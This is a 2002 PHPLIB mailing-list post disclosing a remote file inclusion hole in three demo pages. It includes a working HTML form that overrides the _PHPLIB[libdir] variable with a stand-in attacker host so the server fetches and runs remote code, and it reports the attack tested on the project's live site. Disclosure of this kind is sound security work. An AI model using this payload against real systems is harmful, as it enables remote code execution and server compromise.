[Phplib-users] security hole !!!Remote code execution !!!
Brought to you by:
nhruby,
richardarcher
Menu
▾
▴
[Phplib-users] security hole !!!Remote code execution !!!
|
From: Pawel L. <paw...@il...> - 2002-03-02 16:02:07
|
files: /pages/new_user_alt.php3 /pages/view_sessions.php3 /pages/showoff.php3 line: include($_PHPLIB["libdir"] . "table.inc"); example: <form method=POST action="http://phplib.sourceforge.net/showroom/view_sessions.php3"> <input type=hidden name="_PHPLIB[libdir]" value="http://hacker.site/some_path/"> <input type=submit> versions tested: <7.4-pr1 tested, (and works) on http://phplib.sourceforge.net/ |
